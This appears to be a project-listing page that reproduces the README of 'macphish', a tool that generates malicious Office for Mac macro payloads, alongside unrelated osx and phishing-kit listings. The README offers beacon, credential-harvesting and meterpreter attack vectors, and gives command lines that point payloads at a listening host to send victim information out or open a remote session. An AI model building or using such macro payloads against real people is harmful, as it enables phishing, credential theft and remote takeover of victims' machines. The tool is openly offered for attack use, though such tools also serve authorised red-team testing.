All Projects → cldrn → Macphish

cldrn / Macphish

Licence: mit
Office for Mac Macro Payload Generator

Programming Languages

python
139335 projects - #7 most used programming language
applescript
352 projects
macros
77 projects

Projects that are alternatives of or similar to Macphish

Agkozak Zsh Prompt
A fast, asynchronous ZSH prompt with color ASCII indicators of Git, exit, SSH, virtual environment, and vi mode status. Framework-agnostic and customizable.
Stars: ✭ 182 (-9.9%)
Mutual labels:  osx
Godot Kotlin Native
Kotlin bindings for Godot Engine
Stars: ✭ 186 (-7.92%)
Mutual labels:  osx
Seamly2d
Open source patternmaking software.
Stars: ✭ 197 (-2.48%)
Mutual labels:  osx
Dns Heaven
Fixes stupid macOS DNS stack (/etc/resolv.conf)
Stars: ✭ 182 (-9.9%)
Mutual labels:  osx
Folder Icons
Custom folder icons for macOS & Windows
Stars: ✭ 186 (-7.92%)
Mutual labels:  osx
Comics Downloader
tool to download comics and manga in pdf/epub/cbr/cbz from a website
Stars: ✭ 190 (-5.94%)
Mutual labels:  osx
Magnum Examples
Examples for the Magnum C++11/C++14 graphics engine
Stars: ✭ 180 (-10.89%)
Mutual labels:  osx
Vagrant Debian Jessie
Automatic Debian 8 Vagrant base box building on OSX, Linux and Windows
Stars: ✭ 199 (-1.49%)
Mutual labels:  osx
Keka
The macOS file archiver
Stars: ✭ 2,609 (+1191.58%)
Mutual labels:  osx
Cocoa Rest Client
A free, native Apple macOS app for testing HTTP/REST endpoints
Stars: ✭ 2,257 (+1017.33%)
Mutual labels:  osx
Commander
Test your command line interfaces on windows, linux and osx and nodes viá ssh and docker
Stars: ✭ 183 (-9.41%)
Mutual labels:  osx
Openssl Osx Ca
Simple periodic task to sync OSX Keychain certs to Homebrew installed OpenSSL & LibreSSL
Stars: ✭ 185 (-8.42%)
Mutual labels:  osx
Gitem
A Github organization reconnaissance tool.
Stars: ✭ 190 (-5.94%)
Mutual labels:  phishing
Seashore
easy to use mac osx image editing application for the rest of us
Stars: ✭ 182 (-9.9%)
Mutual labels:  osx
Screenshot Desktop
💻 Capture a screenshot of your local machine
Stars: ✭ 197 (-2.48%)
Mutual labels:  osx
Acloud Dl
A cross-platform python based utility to download courses from acloud.guru for personal offline use.
Stars: ✭ 181 (-10.4%)
Mutual labels:  osx
Chartjs Plugin Colorschemes
Predefined color schemes for Chart.js
Stars: ✭ 189 (-6.44%)
Mutual labels:  office
Socialfishmobile
📱 🐟 An app to remote control SocialFish.
Stars: ✭ 200 (-0.99%)
Mutual labels:  phishing
Gridcal
GridCal, a cross-platform power systems solver written in Python with user interface and embedded python console
Stars: ✭ 197 (-2.48%)
Mutual labels:  osx
Blackeye Python
BlackEye Phishing Kit in Python w Serveo Subdomain Creation | Educational Purposes Only
Stars: ✭ 191 (-5.45%)
Mutual labels:  phishing

macphish

Office for Mac Macro Payload Generator macphish

Attack vectors

There are 4 attack vectors available:

  • beacon
  • creds
  • meterpreter
  • meterpreter-grant

For the 'creds' method, macphish can generate the Applescript script directly, in case you need to run it from a shell.

beacon

On execution, this payload will signal our listening host and provide basic system information about the victim. The simplest way of generating a beacon payload is:

$./macphish.py -lh <listening host> 

By default, it uses curl but other utilities (wget, nslookup) can be used by modifying the command template.

creds

$./macphish.py -lh <listening host> -lp <listening port> -a creds

meterpreter

The simplest way of generating a meterpreter payload is:

$./macphish.py -lh <listening host> -lp <listening port> -p <payload> -a meterpreter 

meterpreter-grant

The generate a meterpreter payload that calls GrantAccessToMultipleFiles() first:

$./macphish.py -lh <listening host> -lp <listening port> -p <payload> -a meterpreter-grant

For meterpreter attacks, only python payloads are supported at the moment.

Usage

See https://github.com/cldrn/macphish/wiki/Usage

PoCs

Note that the project description data, including the texts, logos, images, and/or trademarks, for each open source project belongs to its rightful owner. If you wish to add or remove any projects, please contact us at [email protected].